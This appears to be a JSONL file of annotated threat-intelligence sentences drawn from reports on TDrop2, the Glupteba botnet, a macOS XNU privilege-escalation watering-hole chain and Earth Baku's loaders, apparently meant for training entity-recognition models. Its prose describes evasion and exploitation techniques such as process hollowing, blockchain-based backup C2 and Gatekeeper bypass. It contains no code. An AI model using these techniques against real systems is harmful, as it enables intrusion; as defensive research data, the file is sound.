HKCU\\Software\\Microsoft\\HY08A\\[unique_identifier] The TDrop2 malware family that was witnessed in a recent attack against a European transportation company provided a minimal set of commands to the attackers.","entities":[{"id":45428,"label":"REGISTRYKEY","start_offset":59,"end_offset":95},{"id":45430,"label":"malware","start_offset":442,"end_offset":448},{"id":6702,"label":"REGISTRYKEY","start_offset":387,"end_offset":435},{"id":47329,"label":"location","start_offset":512,"end_offset":520}],"relations":[],"Comments":[]} -{"id":2257,"text":"It was most likely used to establish a foothold, perform reconnaissance and deploy further malware into the victim’s network.","entities":[],"relations":[],"Comments":[]} -{"id":2258,"text":"While the malware lacked a large set of capabilities, it had a wealth of interesting and advanced features, such as the custom encryption\/encoding witnessed in the network traffic, the use of process hollowing against a randomly selected Microsoft Windows binary, and the downloading component that attempted to bypass network security measures by modifying the executable header.","entities":[{"id":47331,"label":"SOFTWARE","start_offset":238,"end_offset":255},{"id":47330,"label":"attack-pattern","start_offset":192,"end_offset":209}],"relations":[],"Comments":[]} -{"id":2259,"text":" We created the AutoFocus tag TDrop2 to identify samples of this new variant and added known C2 domains and hash values to the Threat Prevention product set.","entities":[{"id":45431,"label":"malware","start_offset":30,"end_offset":36}],"relations":[],"Comments":[]} -{"id":2260,"text":"At this time, WildFire is able to correctly identify the samples associated with this campaign as malicious.","entities":[{"id":47332,"label":"SOFTWARE","start_offset":14,"end_offset":22}],"relations":[],"Comments":[]} -{"id":2261,"text":" Stage 1 Stage 2 Stage 3 Stage 4 Stage 5 ","entities":[],"relations":[],"Comments":[]} -{"id":2262,"text":"Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":2263,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":2264,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q1 2022.","entities":[{"id":47333,"label":"TIME","start_offset":96,"end_offset":103}],"relations":[],"Comments":[]} -{"id":2265,"text":"It was last updated on May 12, 2022.","entities":[{"id":45432,"label":"TIME","start_offset":23,"end_offset":35}],"relations":[],"Comments":[]} -{"id":2267,"text":"Google TAG actively monitors threat actors and the evolution of their tactics and techniques.","entities":[{"id":47335,"label":"identity","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} -{"id":2268,"text":"We use our research to continuously improve the safety and security of our products and share this intelligence with the community to benefit the internet as a whole.","entities":[],"relations":[],"Comments":[]} -{"id":2269,"text":"As announced today, Google has taken action to disrupt the operations of Glupteba, a multi-component botnet targeting Windows computers.","entities":[{"id":6747,"label":"malware","start_offset":73,"end_offset":81},{"id":47336,"label":"identity","start_offset":20,"end_offset":26},{"id":47337,"label":"SOFTWARE","start_offset":118,"end_offset":125}],"relations":[],"Comments":[]} -{"id":2270,"text":"We believe this action will have a significant impact on Glupteba's operations.","entities":[{"id":47338,"label":"malware","start_offset":57,"end_offset":65}],"relations":[],"Comments":[]} -{"id":2271,"text":"However, the operators of Glupteba are likely to attempt to regain control of the botnet using a backup command and control mechanism that uses data encoded on the Bitcoin blockchain.","entities":[{"id":45434,"label":"malware","start_offset":26,"end_offset":34},{"id":45433,"label":"SOFTWARE","start_offset":164,"end_offset":171}],"relations":[],"Comments":[]} -{"id":2272,"text":"Glupteba is known to steal user credentials and cookies, mine cryptocurrencies on infected hosts, deploy and operate proxy components targeting Windows systems and IoT devices.","entities":[{"id":47339,"label":"malware","start_offset":0,"end_offset":8},{"id":47343,"label":"attack-pattern","start_offset":57,"end_offset":96},{"id":47340,"label":"SOFTWARE","start_offset":144,"end_offset":151},{"id":47341,"label":"attack-pattern","start_offset":21,"end_offset":55},{"id":47342,"label":"attack-pattern","start_offset":98,"end_offset":133}],"relations":[],"Comments":[]} -{"id":2273,"text":"TAG has observed the botnet targeting victims worldwide, including the US, India, Brazil and Southeast Asia.","entities":[{"id":47345,"label":"location","start_offset":71,"end_offset":73},{"id":47344,"label":"identity","start_offset":0,"end_offset":3},{"id":47347,"label":"location","start_offset":82,"end_offset":88},{"id":47346,"label":"location","start_offset":75,"end_offset":80},{"id":47348,"label":"location","start_offset":93,"end_offset":107}],"relations":[],"Comments":[]} -{"id":2274,"text":"The Glupteba malware family is primarily distributed through pay per install (PPI) networks and via traffic purchased from traffic distribution systems (TDS).","entities":[{"id":45435,"label":"malware","start_offset":4,"end_offset":12}],"relations":[],"Comments":[]} -{"id":2275,"text":"For a period of time, we observed thousands of instances of malicious Glupteba downloads per day.","entities":[{"id":6771,"label":"malware","start_offset":70,"end_offset":78}],"relations":[],"Comments":[]} -{"id":2276,"text":"The following image shows a webpage mimicking a software crack download which delivers a variant of Glupteba to users instead of the promised software.","entities":[{"id":6773,"label":"malware","start_offset":100,"end_offset":108}],"relations":[],"Comments":[]} -{"id":2277,"text":"While analyzing Glupteba binaries, our team identified a few containing a git repository URL: “git.voltronwork.com”.","entities":[{"id":45437,"label":"DOMAIN","start_offset":95,"end_offset":114},{"id":45436,"label":"malware","start_offset":16,"end_offset":24}],"relations":[],"Comments":[]} -{"id":2278,"text":"This finding sparked an investigation that led us to identify, with high confidence, multiple online services offered by the individuals operating the Glupteba botnet.","entities":[{"id":6777,"label":"malware","start_offset":151,"end_offset":159}],"relations":[],"Comments":[]} -{"id":2279,"text":"These services include selling access to virtual machines loaded with stolen credentials (dont[.]farm), proxy access (awmproxy), and selling credit card numbers (extracard) to be used for other malicious activities such as serving malicious ads and payment fraud on Google Ads.","entities":[{"id":47349,"label":"DOMAIN","start_offset":90,"end_offset":101},{"id":47350,"label":"SOFTWARE","start_offset":266,"end_offset":276}],"relations":[],"Comments":[]} -{"id":2280,"text":"This past year, TAG has been collaborating with Google’s CyberCrime Investigation Group to disrupt Glupteba activity involving Google services.","entities":[{"id":45441,"label":"identity","start_offset":16,"end_offset":19},{"id":45438,"label":"malware","start_offset":99,"end_offset":107},{"id":45439,"label":"identity","start_offset":48,"end_offset":87},{"id":45440,"label":"SOFTWARE","start_offset":127,"end_offset":142}],"relations":[],"Comments":[]} -{"id":2281,"text":"We’ve terminated around 63M Google Docs observed to have distributed Glupteba, 1,183 Google Accounts, 908 Cloud Projects, and 870 Google Ads accounts associated with their distribution.","entities":[{"id":47353,"label":"SOFTWARE","start_offset":130,"end_offset":140},{"id":47351,"label":"SOFTWARE","start_offset":28,"end_offset":39},{"id":47352,"label":"malware","start_offset":69,"end_offset":77}],"relations":[],"Comments":[]} -{"id":2282,"text":"Furthermore, 3.5M users were warned before downloading a malicious file through Google Safe Browsing warnings.","entities":[{"id":47354,"label":"SOFTWARE","start_offset":80,"end_offset":100}],"relations":[],"Comments":[]} -{"id":2283,"text":"In the last few days, our team partnered with Internet infrastructure providers and hosting providers, including Cloudflare, to disrupt Glupteba’s operation by taking down servers and placing warning interstitial pages in front of the malicious domain names.","entities":[{"id":45443,"label":"malware","start_offset":136,"end_offset":144},{"id":45442,"label":"identity","start_offset":113,"end_offset":123}],"relations":[],"Comments":[]} -{"id":2284,"text":"During this time, an additional 130 Google accounts associated with this operation were terminated.","entities":[{"id":47355,"label":"identity","start_offset":36,"end_offset":42}],"relations":[],"Comments":[]} -{"id":2285,"text":"Parallel to the analysis, tracking, and technical disruption of this botnet, Google has filed a lawsuit against two individuals believed to be located in Russia for operating the Glupteba Botnet and its various criminal schemes.","entities":[{"id":47357,"label":"identity","start_offset":77,"end_offset":83},{"id":47356,"label":"malware","start_offset":179,"end_offset":187},{"id":47358,"label":"location","start_offset":154,"end_offset":160}],"relations":[{"id":314,"from_id":47356,"to_id":47358,"type":"located-at"}],"Comments":[]} -{"id":2286,"text":"Google is alleging violations under the Racketeer Influenced and Corrupt Organizations Act (RICO), the Computer Fraud and Abuse Act, the Electronic Communications Privacy Act, the Lanham Act, and tortious interference of business relationships, and unjust enrichment.","entities":[{"id":45444,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} -{"id":2287,"text":"While these actions may not completely stop Glupteba, TAG estimates that combined efforts will materially affect the actor’s ability to conduct future operations.","entities":[{"id":47360,"label":"identity","start_offset":54,"end_offset":57},{"id":47359,"label":"malware","start_offset":44,"end_offset":52}],"relations":[],"Comments":[]} -{"id":2288,"text":"The command and control (C2) communication for this botnet uses HTTPS to communicate commands and binary updates between the control servers and infected systems.","entities":[],"relations":[],"Comments":[]} -{"id":2289,"text":"To add resilience to their infrastructure, the operators have also implemented a backup mechanism using the Bitcoin blockchain.","entities":[{"id":45445,"label":"SOFTWARE","start_offset":108,"end_offset":115}],"relations":[],"Comments":[]} -{"id":2290,"text":"In the event that the main C2 servers do not respond, the infected systems can retrieve backup domains encrypted in the latest transaction from the following bitcoin wallet addresses: The following 32 byte AES keys for decryption are hard coded in the binaries: The blockchain transaction’s OP_RETURN data can be decrypted using AES-256 GCM to provide a backup command and control domain name.","entities":[],"relations":[],"Comments":[]} -{"id":2291,"text":"The first 12 bytes of the OP_RETURN contains the IV, the last 16 bytes the GCM tag, while the middle section is the AES-256 GCM encrypted domain","entities":[],"relations":[],"Comments":[]} -{"id":2292,"text":"Full details of Glupteba’s network protocol can be found in this report from 2020, the following Python script illustrates how one can decrypt an encrypted domain name:","entities":[{"id":45447,"label":"TIME","start_offset":77,"end_offset":81},{"id":45446,"label":"malware","start_offset":16,"end_offset":24}],"relations":[],"Comments":[]} -{"id":2293,"text":"Recent domains used for command and control:","entities":[],"relations":[],"Comments":[]} -{"id":2294,"text":" Recent sha256 hashes of malware samples:","entities":[],"relations":[],"Comments":[]} -{"id":2295,"text":" This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q4 2021.","entities":[{"id":45448,"label":"TIME","start_offset":97,"end_offset":104}],"relations":[],"Comments":[]} -{"id":2296,"text":"It was last updated on February 7, 2022.","entities":[{"id":47362,"label":"TIME","start_offset":23,"end_offset":39}],"relations":[],"Comments":[]} -{"id":2297,"text":"To protect our users, TAG routinely hunts for 0-day vulnerabilities exploited in-the-wild.","entities":[{"id":47363,"label":"identity","start_offset":22,"end_offset":25}],"relations":[],"Comments":[]} -{"id":2298,"text":"In late August 2021, TAG discovered watering hole attacks targeting visitors to Hong Kong websites for a media outlet and a prominent pro-democracy labor and political group.","entities":[{"id":45449,"label":"TIME","start_offset":8,"end_offset":19},{"id":45451,"label":"attack-pattern","start_offset":36,"end_offset":49},{"id":45453,"label":"identity","start_offset":134,"end_offset":173},{"id":45452,"label":"location","start_offset":80,"end_offset":90},{"id":45450,"label":"identity","start_offset":21,"end_offset":24}],"relations":[{"id":97,"from_id":45453,"to_id":45451,"type":"targets"},{"id":96,"from_id":45451,"to_id":45452,"type":"targets"}],"Comments":[]} -{"id":2299,"text":"The watering hole served an XNU privilege escalation vulnerability (CVE-2021-30869) unpatched in macOS Catalina, which led to the installation of a previously unreported backdoor.","entities":[{"id":47364,"label":"vulnerability","start_offset":68,"end_offset":82},{"id":47365,"label":"SOFTWARE","start_offset":97,"end_offset":111},{"id":47366,"label":"vulnerability","start_offset":28,"end_offset":66}],"relations":[{"id":315,"from_id":47365,"to_id":47364,"type":"has"}],"Comments":[]} -{"id":2300,"text":"As is our policy, we quickly reported this 0-day to the vendor (Apple) and a patch was released to protect users from these attacks.","entities":[{"id":47367,"label":"identity","start_offset":64,"end_offset":69}],"relations":[],"Comments":[]} -{"id":2301,"text":"Based on our findings, we believe this threat actor to be a well-resourced group, likely state backed, with access to their own software engineering team based on the quality of the payload code.","entities":[],"relations":[],"Comments":[]} -{"id":2302,"text":"In this blog we analyze the technical details of the exploit chain and share IOCs to help teams defend against similar style attacks.","entities":[],"relations":[],"Comments":[]} -{"id":2303,"text":" The websites leveraged for the attacks contained two iframes which served exploits from an attacker-controlled server—one for iOS and the other for macOS.","entities":[{"id":47368,"label":"SOFTWARE","start_offset":127,"end_offset":130},{"id":47369,"label":"SOFTWARE","start_offset":149,"end_offset":154}],"relations":[],"Comments":[]} -{"id":2304,"text":"iOS Exploits","entities":[{"id":45455,"label":"SOFTWARE","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} -{"id":2305,"text":"The iOS exploit chain used a framework based on Ironsquirrel to encrypt exploits delivered to the victim's browser.","entities":[{"id":6866,"label":"malware","start_offset":48,"end_offset":60},{"id":47370,"label":"SOFTWARE","start_offset":4,"end_offset":7}],"relations":[],"Comments":[]} -{"id":2306,"text":"We did not manage to get a complete iOS chain this time, just a partial one where CVE-2019-8506 was used to get code execution in Safari.","entities":[{"id":47373,"label":"SOFTWARE","start_offset":130,"end_offset":136},{"id":47371,"label":"SOFTWARE","start_offset":36,"end_offset":39},{"id":47372,"label":"vulnerability","start_offset":82,"end_offset":95}],"relations":[],"Comments":[]} -{"id":2307,"text":"macOS Exploits","entities":[{"id":45454,"label":"SOFTWARE","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} -{"id":2308,"text":"The macOS exploits did not use the same framework as iOS ones.","entities":[{"id":47374,"label":"SOFTWARE","start_offset":4,"end_offset":9},{"id":47375,"label":"SOFTWARE","start_offset":53,"end_offset":56}],"relations":[],"Comments":[]} -{"id":2309,"text":"The landing page contained a simple HTML page loading two scripts—one for Capstone.js and another for the exploit chain.","entities":[{"id":47396,"label":"SOFTWARE","start_offset":74,"end_offset":85}],"relations":[],"Comments":[]} -{"id":2310,"text":"The parameter rid is a global counter which records the number of exploitation attempts.","entities":[],"relations":[],"Comments":[]} -{"id":2311,"text":"This number was in the 200s when we obtained the exploit chain.","entities":[],"relations":[],"Comments":[]} -{"id":2312,"text":"While the javascript starting the exploit chain checks whether visitors were running macOS Mojave (10.14) or Catalina (10.15) before proceeding to run the exploits, we only observed remnants of an exploit when visiting the site with Mojave but received the full non-encrypted exploit chain when browsing the site with Catalina.","entities":[{"id":47376,"label":"SOFTWARE","start_offset":85,"end_offset":105},{"id":47377,"label":"SOFTWARE","start_offset":109,"end_offset":125},{"id":47378,"label":"SOFTWARE","start_offset":233,"end_offset":239},{"id":47379,"label":"SOFTWARE","start_offset":318,"end_offset":326}],"relations":[],"Comments":[]} -{"id":2313,"text":"The exploit chain combined an RCE in WebKit exploiting CVE-2021-1789 which was patched on Jan 5, 2021 before discovery of this campaign and a 0-day local privilege escalation in XNU (CVE-2021-30869) patched on Sept 23, 2021.","entities":[{"id":45456,"label":"vulnerability","start_offset":55,"end_offset":68},{"id":45462,"label":"SOFTWARE","start_offset":178,"end_offset":181},{"id":45460,"label":"TIME","start_offset":210,"end_offset":223},{"id":45461,"label":"attack-pattern","start_offset":148,"end_offset":174},{"id":45457,"label":"SOFTWARE","start_offset":37,"end_offset":43},{"id":45458,"label":"TIME","start_offset":90,"end_offset":101},{"id":45459,"label":"vulnerability","start_offset":183,"end_offset":197}],"relations":[{"id":98,"from_id":45456,"to_id":45457,"type":"has"},{"id":99,"from_id":45459,"to_id":45462,"type":"has"}],"Comments":[]} -{"id":2314,"text":" Loading a page with the WebKit RCE on the latest version of Safari (14.1), we learned the RCE was an n-day since it did not successfully trigger the exploit.","entities":[{"id":47386,"label":"vulnerability","start_offset":32,"end_offset":35},{"id":47387,"label":"vulnerability","start_offset":91,"end_offset":94},{"id":47383,"label":"SOFTWARE","start_offset":25,"end_offset":31},{"id":47385,"label":"SOFTWARE","start_offset":61,"end_offset":74}],"relations":[],"Comments":[]} -{"id":2315,"text":"To verify this hypothesis, we ran git bisect and determined it was fixed in this commit.","entities":[],"relations":[],"Comments":[]} -{"id":2316,"text":"Capstone.js","entities":[{"id":45463,"label":"SOFTWARE","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} -{"id":2317,"text":"It was interesting to see the use of Capstone.js, a port of the Capstone disassembly framework, in an exploit chain as Capstone is typically used for binary analysis.","entities":[{"id":47388,"label":"SOFTWARE","start_offset":37,"end_offset":48},{"id":47391,"label":"SOFTWARE","start_offset":119,"end_offset":127},{"id":47390,"label":"SOFTWARE","start_offset":64,"end_offset":94}],"relations":[],"Comments":[]} -{"id":2318,"text":"The exploit authors primarily used it to search for the addresses of dlopen and dlsym in memory.","entities":[],"relations":[],"Comments":[]} -{"id":2319,"text":"Once the embedded Mach-O is loaded, the dlopen and dlsym addresses found using Capstone.js are used to patch the Mach-O loaded in memory.","entities":[{"id":47393,"label":"SOFTWARE","start_offset":79,"end_offset":90}],"relations":[],"Comments":[]} -{"id":2320,"text":"With the Capstone.js configured for X86-64 and not ARM, we can also derive the target hardware is Intel-based Macs.","entities":[{"id":47394,"label":"SOFTWARE","start_offset":9,"end_offset":20}],"relations":[],"Comments":[]} -{"id":2321,"text":"Embedded Mach-O","entities":[],"relations":[],"Comments":[]} -{"id":2322,"text":"After the WebKit RCE succeeds, an embedded Mach-O binary is loaded into memory, patched, and run.","entities":[{"id":47397,"label":"SOFTWARE","start_offset":10,"end_offset":16}],"relations":[],"Comments":[]} -{"id":2323,"text":"Upon analysis, we realized this binary contained code which could escape the Safari sandbox, elevate privileges, and download a second stage from the C2.","entities":[{"id":47398,"label":"SOFTWARE","start_offset":77,"end_offset":83}],"relations":[],"Comments":[]} -{"id":2324,"text":"Analyzing the Mach-O was reminiscent of a CTF reverse engineering challenge.","entities":[],"relations":[],"Comments":[]} -{"id":2325,"text":"It had to be extracted and converted into binary from a Uint32Array.","entities":[],"relations":[],"Comments":[]} -{"id":2326,"text":"Then the extracted binary was heavily obfuscated with a relatively tedious encoding mechanism--each string is XOR encoded with a different key.","entities":[],"relations":[],"Comments":[]} -{"id":2327,"text":"Fully decoding the Mach-O was necessary to obtain all the strings representing the dynamically loaded functions used in the binary.","entities":[],"relations":[],"Comments":[]} -{"id":2328,"text":"There were a lot of strings and decoding them manually would have taken a long time so we wrote a short Python script to make quick work of the obfuscation.","entities":[],"relations":[],"Comments":[]} -{"id":2329,"text":"The script parsed the Mach-O at each section where the strings were located, then decoded the strings with their respective XOR keys, and patched the binary with the resulting strings.","entities":[],"relations":[],"Comments":[]} -{"id":2330,"text":"Once we had all of the strings decoded, it was time to figure out what capabilities the binary had.","entities":[],"relations":[],"Comments":[]} -{"id":2331,"text":"There was code to download a file from a C2 but we did not come across any URL strings in the Mach-O so we checked the javascript and saw there were two arguments passed when the binary is run–the url for the payload and its size","entities":[],"relations":[],"Comments":[]} -{"id":2332,"text":"After downloading the payload, it removes the quarantine attribute of the file to bypass Gatekeeper.","entities":[],"relations":[],"Comments":[]} -{"id":2333,"text":"It then elevated privileges to install the payload.","entities":[],"relations":[],"Comments":[]} -{"id":2334,"text":"day or 0-day?","entities":[],"relations":[],"Comments":[]} -{"id":2335,"text":"Before further analyzing how the exploit elevated privileges, we needed to figure out if we were dealing with an N-day or a 0-day vulnerability.","entities":[],"relations":[],"Comments":[]} -{"id":2336,"text":"An N-day is a known vulnerability with a publicly available patch.","entities":[],"relations":[],"Comments":[]} -{"id":2337,"text":"Threat actors have used N-days shortly after a patch is released to capitalize on the patching delay of their targets.","entities":[],"relations":[],"Comments":[]} -{"id":2338,"text":"In contrast, a 0-day is a vulnerability with no available patch which makes it harder to defend against.","entities":[],"relations":[],"Comments":[]} -{"id":2339,"text":"Despite the exploit being an executable instead of shellcode, it was not a standalone binary we could run in our virtual environment.","entities":[],"relations":[],"Comments":[]} -{"id":2340,"text":"It needed the address of dlopen and dlsym patched after the binary was loaded into memory.","entities":[],"relations":[],"Comments":[]} -{"id":2341,"text":"These two functions are used in conjunction to dynamically load a shared object into memory and retrieve the address of a symbol from it.","entities":[],"relations":[],"Comments":[]} -{"id":2342,"text":"They are the equivalent of LoadLibrary and GetProcAddress in Windows.","entities":[{"id":47399,"label":"SOFTWARE","start_offset":61,"end_offset":68}],"relations":[],"Comments":[]} -{"id":2343,"text":"To run the exploit in our virtual environment, we decided to write a loader in Python which did the following: For our payload, we wrote a simple bash script which runs id and pipes the result to a file in \/tmp.","entities":[],"relations":[],"Comments":[]} -{"id":2344,"text":"The result of the id command would tell us whether our script was run as a regular user or as root.","entities":[],"relations":[],"Comments":[]} -{"id":2345,"text":"Having a loader and a payload ready, we set out to test the exploit on a fresh install of Catalina (10.15) since it was the version in which we were served the full exploit chain.","entities":[{"id":47400,"label":"SOFTWARE","start_offset":90,"end_offset":106}],"relations":[],"Comments":[]} -{"id":2346,"text":"The exploit worked and ran our bash script as root.","entities":[],"relations":[],"Comments":[]} -{"id":2347,"text":"We updated our operating system with the latest patch at the time (2021-004) and tried the exploit again.","entities":[{"id":47401,"label":"TIME","start_offset":67,"end_offset":75}],"relations":[],"Comments":[]} -{"id":2348,"text":"It still worked.","entities":[],"relations":[],"Comments":[]} -{"id":2349,"text":"We then decided to try it on Big Sur (11.4) where it crashed and gave us the following exception.","entities":[{"id":45465,"label":"SOFTWARE","start_offset":29,"end_offset":43}],"relations":[],"Comments":[]} -{"id":2350,"text":"The exception indicates that Apple added generic protections in Big Sur which rendered this exploit useless.","entities":[{"id":47405,"label":"SOFTWARE","start_offset":64,"end_offset":71},{"id":47404,"label":"identity","start_offset":29,"end_offset":34}],"relations":[],"Comments":[]} -{"id":2351,"text":"Since Apple still supports Catalina and pushes security updates for it, we decided to take a deeper look into this exploit.","entities":[{"id":47406,"label":"identity","start_offset":6,"end_offset":11},{"id":47407,"label":"SOFTWARE","start_offset":27,"end_offset":35}],"relations":[],"Comments":[]} -{"id":2352,"text":"Elevating Privileges to Root The Mach-O was calling a lot of undocumented functions as well as XPC calls to mach_msg with a MACH_SEND_SYNC_OVERRIDE flag.","entities":[],"relations":[],"Comments":[]} -{"id":2353,"text":"This looked similar to an earlier in-the-wild iOS vulnerability analyzed by Ian Beer of Google Project Zero.","entities":[{"id":47408,"label":"SOFTWARE","start_offset":46,"end_offset":49},{"id":47409,"label":"identity","start_offset":88,"end_offset":107},{"id":47410,"label":"identity","start_offset":76,"end_offset":84}],"relations":[],"Comments":[]} -{"id":2354,"text":"Beer was able to quickly recognize this exploit as a variant of an earlier port type confusion vulnerability he analyzed in the XNU kernel (CVE-2020-27932).","entities":[{"id":47411,"label":"SOFTWARE","start_offset":128,"end_offset":138},{"id":47412,"label":"vulnerability","start_offset":140,"end_offset":154}],"relations":[{"id":318,"from_id":47412,"to_id":47411,"type":"has"}],"Comments":[]} -{"id":2355,"text":"Furthermore, it seems this exact exploit was presented by Pangu Lab in a public talk at zer0con21 in April 2021 and Mobile Security Conference (MOSEC) in July 2021.","entities":[{"id":45470,"label":"identity","start_offset":58,"end_offset":67},{"id":45468,"label":"identity","start_offset":116,"end_offset":150},{"id":45469,"label":"TIME","start_offset":154,"end_offset":163},{"id":45466,"label":"identity","start_offset":88,"end_offset":97},{"id":45467,"label":"TIME","start_offset":101,"end_offset":111}],"relations":[],"Comments":[]} -{"id":2356,"text":"In exploiting this port type confusion vulnerability, the exploit authors were able to change the mach port type from IKOT_NAMED_ENTRY to a more privileged port type like IKOT_HOST_SECURITY allowing them to forge their own sec_token and audit_token, and IKOT_HOST_PRIV enabling them to spoof messages to kuncd. After gaining root, the downloaded payload is loaded and run in the background on the victim's machine via launchtl.","entities":[],"relations":[],"Comments":[]} -{"id":2357,"text":"The payload seems to be a product of extensive software engineering.","entities":[],"relations":[],"Comments":[]} -{"id":2358,"text":"It uses a publish-subscribe model via a Data Distribution Service (DDS) framework for communicating with the C2.","entities":[{"id":47413,"label":"SOFTWARE","start_offset":40,"end_offset":71}],"relations":[],"Comments":[]} -{"id":2359,"text":"It also has several components, some of which appear to be configured as modules.","entities":[],"relations":[],"Comments":[]} -{"id":2360,"text":"For example, the payload we obtained contained a kernel module for capturing keystrokes.","entities":[],"relations":[],"Comments":[]} -{"id":2361,"text":"There are also other functionalities built-in to the components which were not directly accessed from the binaries included in the payload but may be used by additional stages which can be downloaded onto the victim's machine.","entities":[],"relations":[],"Comments":[]} -{"id":2362,"text":"Notable features for this backdoor include: Our team is constantly working to secure our users and keep them safe from targeted attacks like this one.","entities":[],"relations":[],"Comments":[]} -{"id":2363,"text":"We continue to collaborate with internal teams like Google Safe Browsing to block domains and IPs used for exploit delivery and industry partners like Apple to mitigate vulnerabilities.","entities":[{"id":47414,"label":"SOFTWARE","start_offset":52,"end_offset":72},{"id":47415,"label":"identity","start_offset":151,"end_offset":156}],"relations":[],"Comments":[]} -{"id":2364,"text":"We are appreciative of Apple’s quick response and patching of this critical vulnerability.","entities":[{"id":47416,"label":"identity","start_offset":23,"end_offset":28}],"relations":[],"Comments":[]} -{"id":2365,"text":"For those interested in following our in-the-wild work, we will soon publish details surrounding another, unrelated campaign we discovered using two Chrome 0-days (CVE-2021-37973 and CVE-2021-37976).","entities":[{"id":47418,"label":"vulnerability","start_offset":183,"end_offset":197},{"id":47419,"label":"SOFTWARE","start_offset":149,"end_offset":155},{"id":47417,"label":"vulnerability","start_offset":164,"end_offset":178}],"relations":[{"id":319,"from_id":47419,"to_id":47417,"type":"has"},{"id":320,"from_id":47419,"to_id":47418,"type":"has"}],"Comments":[]} -{"id":2366,"text":"That campaign is not connected to the one described in today’s post.","entities":[],"relations":[],"Comments":[]} -{"id":2367,"text":" Delivery URLs Javascript Sandbox escape \/ LPE Backdoor C2","entities":[],"relations":[],"Comments":[]} -{"id":2368,"text":"We have uncovered a cyberespionage campaign being perpetrated by Earth Baku, an advanced persistent threat (APT) group with a known history of carrying out cyberattacks under the alias APT41.","entities":[{"id":47423,"label":"threat-actor","start_offset":185,"end_offset":190},{"id":47424,"label":"threat-actor","start_offset":65,"end_offset":75}],"relations":[{"id":321,"from_id":47424,"to_id":47423,"type":"duplicate-of"}],"Comments":[]} -{"id":2369,"text":"This is not the group’s first foray into cyberespionage, and its long list of past cybercrimes also includes ransomware and cryptocurrency mining attacks.","entities":[],"relations":[],"Comments":[]} -{"id":2370,"text":"Earth Baku deploys its ongoing campaign, which can be traced to as far back as July 2020, through multiple attack vectors that are designed based on different exploits or the infrastructure of its targeted victim's environment: • SQL injection to upload a malicious file • Installment through InstallUtil.exe in a scheduled task • Possibly a malicious link (LNK) file sent as an email attachment • Exploitation of the ProxyLogon vulnerability CVE-2021-26855 to upload a China Chopper web shell This campaign uses previously unidentified shellcode loaders, which we have named StealthVector and StealthMutant, and a backdoor, which we have dubbed ScrambleCross.","entities":[{"id":45480,"label":"threat-actor","start_offset":0,"end_offset":10},{"id":45472,"label":"vulnerability","start_offset":444,"end_offset":458},{"id":45474,"label":"malware","start_offset":578,"end_offset":591},{"id":45475,"label":"malware","start_offset":596,"end_offset":609},{"id":45476,"label":"malware","start_offset":648,"end_offset":661},{"id":45477,"label":"TIME","start_offset":79,"end_offset":88},{"id":45478,"label":"FILEPATH","start_offset":294,"end_offset":309},{"id":45479,"label":"vulnerability","start_offset":419,"end_offset":429},{"id":7033,"label":"attack-pattern","start_offset":231,"end_offset":244},{"id":7034,"label":"attack-pattern","start_offset":315,"end_offset":329},{"id":7036,"label":"malware","start_offset":471,"end_offset":484}],"relations":[{"id":100,"from_id":45479,"to_id":45472,"type":"duplicate-of"},{"id":323,"from_id":45480,"to_id":7033,"type":"uses"},{"id":324,"from_id":45480,"to_id":7034,"type":"uses"}],"Comments":[]} -{"id":2371,"text":"Earth Baku has developed these new malware tools to facilitate targeted attacks on public and private entities alike in specific industries that are located in the Indo-Pacific region.","entities":[{"id":47426,"label":"threat-actor","start_offset":0,"end_offset":10},{"id":47427,"label":"location","start_offset":164,"end_offset":176}],"relations":[],"Comments":[]} -{"id":2373,"text":"Figure 1.","entities":[],"relations":[],"Comments":[]} -{"id":2374,"text":"Countries affected by Earth Baku’s new campaign Source: Trend Micro™ Smart Protection Network™ infrastructure StealthVector","entities":[{"id":47434,"label":"threat-actor","start_offset":22,"end_offset":32},{"id":47436,"label":"malware","start_offset":110,"end_offset":123},{"id":47435,"label":"SOFTWARE","start_offset":56,"end_offset":94}],"relations":[],"Comments":[]} -{"id":2375,"text":"We initially observed StealthVector, a shellcode loader written in C\/C++, in October 2020.","entities":[{"id":47437,"label":"malware","start_offset":22,"end_offset":35},{"id":47438,"label":"TIME","start_offset":77,"end_offset":89}],"relations":[],"Comments":[]} -{"id":2376,"text":"StealthVector is designed with various configurable features that make it easy for malicious actors to modify and tailor it to their needs, including a feature that disables Event Tracing for Windows (ETW), allowing the malware to run in stealth mode.","entities":[{"id":45481,"label":"malware","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} -{"id":2377,"text":"This loader can stealthily run its payload in various ways, such as using the CreateThread function, bypassing Microsoft’s Control Flow Guard (CFG), module stomping, and phantom dynamic link library (DLL) hollowing.","entities":[{"id":47439,"label":"SOFTWARE","start_offset":111,"end_offset":147}],"relations":[],"Comments":[]} -{"id":2378,"text":"StealthMutant Like StealthVector, StealthMutant, which supports both 32-bit and 64-bit operating systems, can disable ETW.","entities":[{"id":47440,"label":"malware","start_offset":0,"end_offset":13},{"id":47442,"label":"malware","start_offset":34,"end_offset":47},{"id":47441,"label":"malware","start_offset":19,"end_offset":32}],"relations":[],"Comments":[]} -{"id":2379,"text":"This loader, written in C#, has been used by malicious actors since July 2020.","entities":[{"id":45482,"label":"TIME","start_offset":68,"end_offset":77}],"relations":[],"Comments":[]} -{"id":2380,"text":"Many of the StealthMutant samples we have analyzed use AES-256-ECB for decryption; alternatively, an earlier variant of the loader uses XOR.","entities":[{"id":47443,"label":"malware","start_offset":12,"end_offset":25}],"relations":[],"Comments":[]} -{"id":2381,"text":"After its payload is decrypted, StealthMutant performs process hollowing to execute its payload in a remote process.","entities":[{"id":7081,"label":"attack-pattern","start_offset":55,"end_offset":72},{"id":47444,"label":"malware","start_offset":32,"end_offset":45}],"relations":[{"id":325,"from_id":47444,"to_id":7081,"type":"uses"}],"Comments":[]} -{"id":2382,"text":"ScrambleCross","entities":[{"id":45483,"label":"malware","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} -{"id":2383,"text":"Both StealthMutant and StealthVector contain a payload of either the Cobalt Strike 